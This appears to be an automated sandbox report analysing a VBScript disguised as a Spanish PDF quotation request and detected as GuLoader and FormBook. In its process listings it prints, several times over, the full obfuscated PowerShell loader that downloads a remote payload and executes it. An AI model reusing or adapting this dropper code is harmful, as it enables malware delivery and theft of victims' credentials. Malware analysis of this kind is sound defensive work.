Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SOLICITUD DE COTIZACI#U00d3N(UG) 03-10-2025#U00b7pdf.vbs

Overview

General Information

Sample name:SOLICITUD DE COTIZACI#U00d3N(UG) 03-10-2025#U00b7pdf.vbs
renamed because original name is a hash value
Original sample name:SOLICITUD DE COTIZACIN(UG) 03-10-2025pdf.vbs
Analysis ID:1634239
MD5:82d5a3c2056b0fef301c5ecb9dde8faf
SHA1:25784d9cafad904c2d4e2864eb35002363f63b35
SHA256:4c6e38470a18fbf67f4fbf231799dfa50937aa6a543a1c4cbe48fc1ea657dcfb
Tags:vbsuser-abuse_ch
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Confidence:100%

Signatures

Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Potential evasive VBS script found (sleep loop)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: Suspicious Scan Loop Network
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7496 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE COTIZACI#U00d3N(UG) 03-10-2025#U00b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 7624 cmdline: ping Host_6637.6637.6637.657e MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1488 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sirupperne; function Rundingers($Frygtet){$Totalafholdsmndenes=4;do{$Utopographer+=$Frygtet[$Totalafholdsmndenes];$Totalafholdsmndenes+=5;$Floss=Format-List} until(!$Frygtet[$Totalafholdsmndenes])$Utopographer}function Exaltative($Skriv){ .($Monoprionidian) ($Skriv)}$Gylpenes=Rundingers ',endNMed E RaaTBrug.fronw';$Gylpenes+=Rundingers 'Timee ,rsbLderCLng lTranI AsseP stN Envt';$Gensidige=Rundingers 'D ciM BidoBiblz FriiE.ecl La.l Fera ha /';$Turf=Rundingers 'bjniTBaldl dogsLand1Ecty2';$Dopingens='Rens[C ten P oe ddatPrea. B,dSTopdER harPhilV haIServCTidseMantpAlano.ervi ndiNRebetAbdimHallas,emn OvoaHis.gAr.iE VikR.wel]Heat: Nem:unshsVerseReklcDe.ruSkonR,edsIChazTexscYBritP r.vrthumOFla t GitoAnaucGlobOAfkol,ept=inte$Su,ktspa.uSkrmrlockF';$Gensidige+=Rundingers 'Beha5Fold. Ste0,ive fors(AktiW estiUdflnDoktdSansoUndsw apas Til AfklN He TSyne Vejn1Dist0Neos.Deka0Li j; Ret KlebWPupiiEloknYayb6F uo4Mark;Tart m.ttxSpor6Loc 4Vite;U do Lystr Sa,vLab,:Prod1Come3Mant4Ra e.Bomb0sani)En a Leg G KaveUb,tcAngrk Insopor./.rea2Macr0Str,1U,de0Supe0Zinc1Yach0Bred1alab R tFTikhiHurtr riheNordf ongoLastxLgtn/H,pn1S.rp3Unde4Urin.Grad0';$Mellemtekst=Rundingers 'freuu nisDaraeSuper S.l-UdslAimprG DisE KronNoniT';$Afskrabede=Rundingers 'Per.hKbintK,ittpolipAn esH,nd:Band/Opda/Pawkd SkarTraniAporv ampeElem.kpengResto eneo kokgeaenlSporeNonf.CopucKer oResemPre /DepiuRececpret?SkaaeSym,xBugbp OraoAdvorBakstHect= L.sdSc ooS xewGenen Ab lUpstoVagiaRed dPaup&Kvi iPsaldMiss= Dag1 BedGFlakfbourxS re5Antac ,rucSt gU Da.z RicPChr qArc 6H peETra R.kviGVallr UnfOKortqTeknCSnitKEnsi4 AnasR gnKIrefqRverR Ulig AfgyFlaa9KalkUEmu w t,r6Bixb8Hjor4';$Pyrotoxin=Rundingers ' Gas>';$Monoprionidian=Rundingers ' debITheoE fo,X';$Underbevelling='Hestestutterier';$Thyrostraca='\Linieskifte.Rig';Exaltative (Rundingers ' S.j$chemgKroplInciOraspBSadeASg.nlIm.r: PendMisteSkrinUnsyU AbsdSietiUncoNBrinGMagn=.mpr$ AdveBregnAjugvS or:Sek aFlamp Genp urgdLystaElecT .araTing+Loch$MusitDik,H BufYSp dRSterORigtSBreftDrt RDelfAI ric ad.a');Exaltative (Rundingers ' for$ atugByggL pulOTil BS riAFroklcit :,abaD arpOYau.mGenaiLsn,N oiniB ctkGelda ,liNSys s m fkPusheFl v=Hexa$Vap aK llfSmaaSRu dKSjleRJazzAUnlyBHoveEkonfdTilsetric.SekssAd,lPStilLRotuiMelaTa,ti(Bejl$NevyPMarkY lacRStero UgetD leo BalxMutai U cndelt)');Exaltative (Rundingers $Dopingens);$Afskrabede=$Dominikanske[0];$tobiser=(Rundingers 'di,t$LandGReseLArchoIsaaBImp AAlarLF ee: OutaSpi H ilfMboelE,koldOlefS Inv=ChaiNTackE OrdWjg r- EuaodegrB SolJFykeECleaCjdertArki P ess nnoY.ktas hotFaseE Vidm Gl .Cum $murpgKlu YGaloLBaluPgenseSystNFor eTaros');Exaltative ($tobiser);Exaltative (Rundingers ' .ng$ mea s ihNajem Le eUdvedBoulsMa.r.DisiHS rae U gaFlatdRes eindtr StosSolm[Pasc$ Di MTekneUnrel Scrl Re eObelmGodst Ch.e Hypk PresUndetC jo] Ada=Hold$BowlGSvejeAbonn .ers W.tiRaindProji JusgMidde');$Siwash=Rundingers 'Prv,$V,ssaZoophChilmsneseSludd esesRiem.A,biDhar,o HemwMagnnProtlJacqoBathaEunudtestFOroliFetllsilkeSvbe(Vedk$Q.anAOfrif Se s.llsk ncorSermaPorpb Tele Herdmic eMi p,Purp$Thurp Ce re teiApaseF lmsPostt Helc rbeaGleipz.ar)';$priestcap=$Denuding;Exaltative (Rundingers 'Blin$DovegVirkLContoOshaBRoofaI,dflCoex:vg.sjChanAAdmiU IsonM,xeTS,naIHar e ParsCattTK,uc= The(FibeTHenseSu,fsProct Ma.-Kul.P OrdaFourtWelsHMeta Fasc$Flerp WagrCanciMat eAne SAxi tC rscCoucAAabnpSerr)');while (!$jauntiest) {Exaltative (Rundingers 'Cami$MacrgUndelLitto Kerb ndkapietlSan : Om.FP ecr VaseErnrmBag bT.ourAsceuTilsdR,kv=fikt$MemoSRiteestrgmTheoa nwat ReniS.rmc') ;Exaltative $Siwash;Exaltative (Rundingers 'Spdb[AssotAhe HSociRPongEB ada indd VenIVicon MougEnte.GoldT BanHT,atRMalpEstifAHalvDBr s]Ma s: Hip:,oncSSa.dL RefeCyk EE icpbybu(Athe4 riv0B by0Vapo0Latv)');Exaltative (Rundingers 'Tomh$MineGPreol AnoOBum bBramaMalaLAld : AmijAdula Af.UDd oNMi wtPa ui VinELageSbifatHo,l= Sh (L mlt ColeDrfyS I cT am-inklpKniva ydtCertHLabi trfo$ DilP H tr RucI MineSpilsCortTDi eCAttrAConcP Cir)') ;Exaltative (Rundingers 'Ridd$BaadgPlanLForzoMesobBoulaDa aLBoud: BatfNo,mi oamMUnwiR,kocEStr,NCurrDNonreBatt=,ogm$PlurGS orl TubOFy dbForha Cadl Sea: FimMGenkIUndeSU dsoAssog LucA stamSupr+Civi+Afba%Anop$ModsDD etoDepom U.di asqNHatcIPr iKBarrAAnilNjaevSxantKMrkeEUngl.slincCorro eaduCe eNSvinT') ;$Afskrabede=$Dominikanske[$Fimrende]}$Cuddy=329441;$Fodlange=30862;Exaltative (Rundingers ' Ele$JacqGCohilD slO.rotBBlomaIllulkurt:Kol oHerorSaftTballh BrloU shGLderR ssiaPsykPMisahOv,rEBannRSodf Bend= typ HemiGEverEQuinTA ti-MatrcRedeoAnotND fttUnsoEtilknVaret ont Mo $Afp.pAvocrOp liVitrEMultSUnd TDetaC ,ulaTilbP');Exaltative (Rundingers ' ar$SexdgImaglTaiwodatabPelva PenlMoll:P,isGMuddtleu eP asmGuaraB,regTe.repod n .kr8 M.t5Unde U,ec= Axw Lion[ UtrSMarsyTryksBoart ngeSt.bmSlat.FlogCSkaaoCopynDamev O eeUtjsrslektPorn],ump:Bran:SkytFSlhurDksko.pstmBangBg,deaE ebs EpeeUnd 6 npr4 NnsST,tatRe.rr IndiYawyn nsegG.in(whit$Mar.OKrigrRas tIderh Fr.oMokkg Belr.veraA brp SuphQualeIn.or Hae)');Exaltative (Rundingers ' Ken$ erag T sL rasO TipBChapa PosLAppr: Urys Wint JujAMeliaElekL PedvVejragr nl C yS onjeRediv SanrEndekFoxhE No r StyNDyr eNatiSRegn Sek = bri .agu[Mi uSsupeYUnf S Anstram EBiogMAkko. SkbTBredEAfgiXKonttFami.Poste DynNSpekcFlexObes.DStopICowbnPaulGOver] Use:Yder: hiraKommsStrac ,peIPindIAste.Praeg,ewieSu.tTmaffSAlt tPaidRkrusiKonkn,tvkgByzo(Ad u$,horgAftvtUni.eAfk.M tonaAnsogTricEVestninde8Shr 5 sem)');Exaltative (Rundingers 'Quic$SkivgIndilSlreO Or B L,pAmuriL.abl: OdomSmidAAfvan T lgUd.ilco.ve ann ,ftD Beneskrv=Orde$UnfeSTe,eT luvaBif AgimmLShavvHypeA,igeL Qu SHeksESat VP agR ShaKVideenontRChornCom eCaensBrad.HomesGreyu.olabS ukSChirtBarrRMej I andNO,tpGLide(Bark$ alkcBombUPoacdoutrdFileYLe e, Und$ MulFFor OFortdIndlLNonfAMid n UdgG Cy eUlot)');Exaltative $Manglende;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • BackgroundTransferHost.exe (PID: 7624 cmdline: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1 MD5: C5D813D92E83CDE3FECD9343933E3421)
  • powershell.exe (PID: 7704 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Sirupperne; function Rundingers($Frygtet){$Totalafholdsmndenes=4;do{$Utopographer+=$Frygtet[$Totalafholdsmndenes];$Totalafholdsmndenes+=5;$Floss=Format-List} until(!$Frygtet[$Totalafholdsmndenes])$Utopographer}function Exaltative($Skriv){ .($Monoprionidian) ($Skriv)}$Gylpenes=Rundingers ',endNMed E RaaTBrug.fronw';$Gylpenes+=Rundingers 'Timee ,rsbLderCLng lTranI AsseP stN Envt';$Gensidige=Rundingers 'D ciM BidoBiblz FriiE.ecl La.l Fera ha /';$Turf=Rundingers 'bjniTBaldl dogsLand1Ecty2';$Dopingens='Rens[C ten P oe ddatPrea. B,dSTopdER harPhilV haIServCTidseMantpAlano.ervi ndiNRebetAbdimHallas,emn OvoaHis.gAr.iE VikR.wel]Heat: Nem:unshsVerseReklcDe.ruSkonR,edsIChazTexscYBritP r.vrthumOFla t GitoAnaucGlobOAfkol,ept=inte$Su,ktspa.uSkrmrlockF';$Gensidige+=Rundingers 'Beha5Fold. Ste0,ive fors(AktiW estiUdflnDoktdSansoUndsw apas Til AfklN He TSyne Vejn1Dist0Neos.Deka0Li j; Ret KlebWPupiiEloknYayb6F uo4Mark;Tart m.ttxSpor6Loc 4Vite;U do Lystr Sa,vLab,:Prod1Come3Mant4Ra e.Bomb0sani)En a Leg G KaveUb,tcAngrk Insopor./.rea2Macr0Str,1U,de0Supe0Zinc1Yach0Bred1alab R tFTikhiHurtr riheNordf ongoLastxLgtn/H,pn1S.rp3Unde4Urin.Grad0';$Mellemtekst=Rundingers 'freuu nisDaraeSuper S.l-UdslAimprG DisE KronNoniT';$Afskrabede=Rundingers 'Per.hKbintK,ittpolipAn esH,nd:Band/Opda/Pawkd SkarTraniAporv ampeElem.kpengResto eneo kokgeaenlSporeNonf.CopucKer oResemPre /DepiuRececpret?SkaaeSym,xBugbp OraoAdvorBakstHect= L.sdSc ooS xewGenen Ab lUpstoVagiaRed dPaup&Kvi iPsaldMiss= Dag1 BedGFlakfbourxS re5Antac ,rucSt gU Da.z RicPChr qArc 6H peETra R.kviGVallr UnfOKortqTeknCSnitKEnsi4 AnasR gnKIrefqRverR Ulig AfgyFlaa9KalkUEmu w t,r6Bixb8Hjor4';$Pyrotoxin=Rundingers ' Gas>';$Monoprionidian=Rundingers ' debITheoE fo,X';$Underbevelling='Hestestutterier';$Thyrostraca='\Linieskifte.Rig';Exaltative (Rundingers ' S.j$chemgKroplInciOraspBSadeASg.nlIm.r: PendMisteSkrinUnsyU AbsdSietiUncoNBrinGMagn=.mpr$ AdveBregnAjugvS or:Sek aFlamp Genp urgdLystaElecT .araTing+Loch$MusitDik,H BufYSp dRSterORigtSBreftDrt RDelfAI ric ad.a');Exaltative (Rundingers ' for$ atugByggL pulOTil BS riAFroklcit :,abaD arpOYau.mGenaiLsn,N oiniB ctkGelda ,liNSys s m fkPusheFl v=Hexa$Vap aK llfSmaaSRu dKSjleRJazzAUnlyBHoveEkonfdTilsetric.SekssAd,lPStilLRotuiMelaTa,ti(Bejl$NevyPMarkY lacRStero UgetD leo BalxMutai U cndelt)');Exaltative (Rundingers $Dopingens);$Afskrabede=$Dominikanske[0];$tobiser=(Rundingers 'di,t$LandGReseLArchoIsaaBImp AAlarLF ee: OutaSpi H ilfMboelE,koldOlefS Inv=ChaiNTackE OrdWjg r- EuaodegrB SolJFykeECleaCjdertArki P ess nnoY.ktas hotFaseE Vidm Gl .Cum $murpgKlu YGaloLBaluPgenseSystNFor eTaros');Exaltative ($tobiser);Exaltative (Rundingers ' .ng$ mea s ihNajem Le eUdvedBoulsMa.r.DisiHS rae U gaFlatdRes eindtr StosSolm[Pasc$ Di MTekneUnrel Scrl Re eObelmGodst Ch.e Hypk PresUndetC jo] Ada=Hold$BowlGSvejeAbonn .ers W.tiRaindProji JusgMidde');$Siwash=Rundingers 'Prv,$V,ssaZoophChilmsneseSludd esesRiem.A,biDhar,o HemwMagnnProtlJacqoBathaEunudtestFOroliFetllsilkeSvbe(Vedk$Q.anAOfrif Se s.llsk ncorSermaPorpb Tele Herdmic eMi p,Purp$Thurp Ce re teiApaseF lmsPostt Helc rbeaGleipz.ar)';$priestcap=$Denuding;Exaltative (Rundingers 'Blin$DovegVirkLContoOshaBRoofaI,dflCoex:vg.sjChanAAdmiU IsonM,xeTS,naIHar e ParsCattTK,uc= The(FibeTHenseSu,fsProct Ma.-Kul.P OrdaFourtWelsHMeta Fasc$Flerp WagrCanciMat eAne SAxi tC rscCoucAAabnpSerr)');while (!$jauntiest) {Exaltative (Rundingers 'Cami$MacrgUndelLitto Kerb ndkapietlSan : Om.FP ecr VaseErnrmBag bT.ourAsceuTilsdR,kv=fikt$MemoSRiteestrgmTheoa nwat ReniS.rmc') ;Exaltative $Siwash;Exaltative (Rundingers 'Spdb[AssotAhe HSociRPongEB ada indd VenIVicon MougEnte.GoldT BanHT,atRMalpEstifAHalvDBr s]Ma s: Hip:,oncSSa.dL RefeCyk EE icpbybu(Athe4 riv0B by0Vapo0Latv)');Exaltative (Rundingers 'Tomh$MineGPreol AnoOBum bBramaMalaLAld : AmijAdula Af.UDd oNMi wtPa ui VinELageSbifatHo,l= Sh (L mlt ColeDrfyS I cT am-inklpKniva ydtCertHLabi trfo$ DilP H tr RucI MineSpilsCortTDi eCAttrAConcP Cir)') ;Exaltative (Rundingers 'Ridd$BaadgPlanLForzoMesobBoulaDa aLBoud: BatfNo,mi oamMUnwiR,kocEStr,NCurrDNonreBatt=,ogm$PlurGS orl TubOFy dbForha Cadl Sea: FimMGenkIUndeSU dsoAssog LucA stamSupr+Civi+Afba%Anop$ModsDD etoDepom U.di asqNHatcIPr iKBarrAAnilNjaevSxantKMrkeEUngl.slincCorro eaduCe eNSvinT') ;$Afskrabede=$Dominikanske[$Fimrende]}$Cuddy=329441;$Fodlange=30862;Exaltative (Rundingers ' Ele$JacqGCohilD slO.rotBBlomaIllulkurt:Kol oHerorSaftTballh BrloU shGLderR ssiaPsykPMisahOv,rEBannRSodf Bend= typ HemiGEverEQuinTA ti-MatrcRedeoAnotND fttUnsoEtilknVaret ont Mo $Afp.pAvocrOp liVitrEMultSUnd TDetaC ,ulaTilbP');Exaltative (Rundingers ' ar$SexdgImaglTaiwodatabPelva PenlMoll:P,isGMuddtleu eP asmGuaraB,regTe.repod n .kr8 M.t5Unde U,ec= Axw Lion[ UtrSMarsyTryksBoart ngeSt.bmSlat.FlogCSkaaoCopynDamev O eeUtjsrslektPorn],ump:Bran:SkytFSlhurDksko.pstmBangBg,deaE ebs EpeeUnd 6 npr4 NnsST,tatRe.rr IndiYawyn nsegG.in(whit$Mar.OKrigrRas tIderh Fr.oMokkg Belr.veraA brp SuphQualeIn.or Hae)');Exaltative (Rundingers ' Ken$ erag T sL rasO TipBChapa PosLAppr: Urys Wint JujAMeliaElekL PedvVejragr nl C yS onjeRediv SanrEndekFoxhE No r StyNDyr eNatiSRegn Sek = bri .agu[Mi uSsupeYUnf S Anstram EBiogMAkko. SkbTBredEAfgiXKonttFami.Poste DynNSpekcFlexObes.DStopICowbnPaulGOver] Use:Yder: hiraKommsStrac ,peIPindIAste.Praeg,ewieSu.tTmaffSAlt tPaidRkrusiKonkn,tvkgByzo(Ad u$,horgAftvtUni.eAfk.M tonaAnsogTricEVestninde8Shr 5 sem)');Exaltative (Rundingers 'Quic$SkivgIndilSlreO Or B L,pAmuriL.abl: OdomSmidAAfvan T lgUd.ilco.ve ann ,ftD Beneskrv=Orde$UnfeSTe,eT luvaBif AgimmLShavvHypeA,igeL Qu SHeksESat VP agR ShaKVideenontRChornCom eCaensBrad.HomesGreyu.olabS ukSChirtBarrRMej I andNO,tpGLide(Bark$ alkcBombUPoacdoutrdFileYLe e, Und$ MulFFor OFortdIndlLNonfAMid n UdgG Cy eUlot)');Exaltative $Manglende;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 1548 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • mAV1geIoraZWu3gOV6nu2g.exe (PID: 7096 cmdline: "C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\9C2mKDLFpC.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • poqexec.exe (PID: 4068 cmdline: "C:\Windows\SysWOW64\poqexec.exe" MD5: 3D570C0E68734A7B81BE47313E442974)
        • findstr.exe (PID: 3516 cmdline: "C:\Windows\SysWOW64\findstr.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • firefox.exe (PID: 1400 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000009.00000002.1953728487.0000000008870000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    0000000E.00000002.2574460468.0000000004740000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000010.00000002.2572546102.00000000003B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000E.00000002.2573699435.0000000000DF0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000010.00000002.2574018901.0000000000AD0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 10 entries
            SourceRuleDescriptionAuthorStrings
            amsi64_1488.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi64_1488.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xfb50:$b2: ::FromBase64String(
              • 0xcefd:$s1: -join
              • 0x66a9:$s4: +=
              • 0x676b:$s4: +=
              • 0xa992:$s4: +=
              • 0xcaaf:$s4: +=
              • 0xcd99:$s4: +=
              • 0xcedf:$s4: +=
              • 0xf253:$s4: +=
              • 0xf2d3:$s4: +=
              • 0xf399:$s4: +=
              • 0xf419:$s4: +=
              • 0xf5ef:$s4: +=
              • 0xf673:$s4: +=
              • 0xd6f3:$e4: Get-WmiObject
              • 0xd8e2:$e4: Get-Process
              • 0xd93a:$e4: Start-Process
              amsi32_7704.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xa6e6:$b2: ::FromBase64String(
              • 0x9795:$s1: -join
              • 0x2f41:$s4: +=
              • 0x3003:$s4: +=
              • 0x722a:$s4: +=
              • 0x9347:$s4: +=
              • 0x9631:$s4: +=
              • 0x9777:$s4: +=
              • 0x13965:$s4: +=
              • 0x139e5:$s4: +=
              • 0x13aab:$s4: +=
              • 0x13b2b:$s4: +=
              • 0x13d01:$s4: +=
              • 0x13d85:$s4: +=
              • 0x9f8b:$e4: Get-WmiObject
              • 0xa17a:$e4: Get-Process
              • 0xa1d2:$e4: Start-Process
              • 0x1460c:$e4: Get-Process

              System Summary

              barindex
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE COTIZACI#U00d3N(UG) 03-10-2025#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE COTIZACI#U00d3N(UG) 03-10-2025#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE COTIZACI#U00d3N(UG) 03-10-2025#U00b7pdf.vbs", ProcessId: 7496, ProcessName: wscript.exe
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.185.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 1548, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 63343
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sirupperne; function Rundingers($Frygtet){$Totalafholdsmndenes=4;do{$Utopographer+=$Frygtet[$Totalafholdsmndenes];$Totalafholdsmndenes+=5;$Floss=Format-List} until(!$Frygtet[$Totalafholdsmndenes])$Utopographer}function Exaltative($Skriv){ .($Monoprionidian) ($Skriv)}$Gylpenes=Rundingers ',endNMed E RaaTBrug.fronw';$Gylpenes+=Rundingers 'Timee ,rsbLderCLng lTranI AsseP stN Envt';$Gensidige=Rundingers 'D ciM BidoBiblz FriiE.ecl La.l Fera ha /';$Turf=Rundingers 'bjniTBaldl dogsLand1Ecty2';$Dopingens='Rens[C ten P oe ddatPrea. B,dSTopdER harPhilV haIServCTidseMantpAlano.ervi ndiNRebetAbdimHallas,emn OvoaHis.gAr.iE VikR.wel]Heat: Nem:unshsVerseReklcDe.ruSkonR,edsIChazTexscYBritP r.vrthumOFla t GitoAnaucGlobOAfkol,ept=inte$Su,ktspa.uSkrmrlockF';$Gensidige+=Rundingers 'Beha5Fold. Ste0,ive fors(AktiW estiUdflnDoktdSansoUndsw apas Til AfklN He TSyne Vejn1Dist0Neos.Deka0Li j; Ret KlebWPupiiEloknYayb6F uo4Mark;Tart m.ttxSpor6Loc 4Vite;U do Lystr Sa,vLab,:Prod1Come3Mant4Ra e.Bomb0sani)En a Leg G KaveUb,tcAngrk Insopor./.rea2Macr0Str,1U,de0Supe0Zinc1Yach0Bred1alab R tFTikhiHurtr riheNordf ongoLastxLgtn/H,pn1S.rp3Unde4Urin.Grad0';$Mellemtekst=Rundingers 'freuu nisDaraeSuper S.l-UdslAimprG DisE KronNoniT';$Afskrabede=Rundingers 'Per.hKbintK,ittpolipAn esH,nd:Band/Opda/Pawkd SkarTraniAporv ampeElem.kpengResto eneo kokgeaenlSporeNonf.CopucKer oResemPre /DepiuRececpret?SkaaeSym,xBugbp OraoAdvorBakstHect= L.sdSc ooS xewGenen Ab lUpstoVagiaRed dPaup&Kvi iPsaldMiss= Dag1 BedGFlakfbourxS re5Antac ,rucSt gU Da.z RicPChr qArc 6H peETra R.kviGVallr UnfOKortqTeknCSnitKEnsi4 AnasR gnKIrefqRverR Ulig AfgyFlaa9KalkUEmu w t,r6Bixb8Hjor4';$Pyrotoxin=Rundingers ' Gas>';$Monoprionidian=Rundingers ' debITheoE fo,X';$Underbevelling='Hestestutterier';$Thyrostraca='\Linieskifte.Rig';Exaltative (Rundingers ' S.j$chemgKroplInciOraspBSadeASg.nlIm.r: PendMisteSkrinUnsyU AbsdSietiUncoNBrinGMagn=.mpr$ AdveBregnAjugvS or:Sek aFlamp Genp urgdLystaElecT .araTing+Loch$MusitDik,H BufYSp dRSterORigtSBreftDrt RDelfAI ric ad.a');Exaltative (Rundingers ' for$ atugByggL pulOTil BS riAFroklcit :,abaD arpOYau.mGenaiLsn,N oiniB ctkGelda ,liNSys s m fkPusheFl v=Hexa$Vap aK llfSmaaSRu dKSjleRJazzAUnlyBHoveEkonfdTilsetric.SekssAd,lPStilLRotuiMelaTa,ti(Bejl$NevyPMarkY lacRStero UgetD leo BalxMutai U cndelt)');Exaltative (Rundingers $Dopingens);$Afskrabede=$Dominikanske[0];$tobiser=(Rundingers 'di,t$LandGReseLArchoIsaaBImp AAlarLF ee: OutaSpi H ilfMboelE,koldOlefS Inv=ChaiNTackE OrdWjg r- EuaodegrB SolJFykeECleaCjdertArki P ess nnoY.ktas hotFaseE Vidm Gl .Cum $murpgKlu YGaloLBaluPgenseSystNFor eTaros');Exaltative ($tobiser);Exaltative (Rundingers ' .ng$ mea s ihNajem Le eUdvedBoulsMa.r.DisiHS rae U gaFlatdRes eindtr StosSolm[Pasc$ Di MTekneUnrel Scrl Re eObelmGodst Ch.e Hypk PresUndetC jo] Ada=Hold$BowlGSvejeAbonn .ers W.tiRaindProji JusgMidde');$Siwash=Rundingers 'Prv,$V,ssaZoophChilmsneseSludd esesRiem.A,biDhar,o HemwMagnnP
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE COTIZACI#U00d3N(UG) 03-10-2025#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE COTIZACI#U00d3N(UG) 03-10-2025#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE COTIZACI#U00d3N(UG) 03-10-2025#U00b7pdf.vbs", ProcessId: 7496, ProcessName: wscript.exe
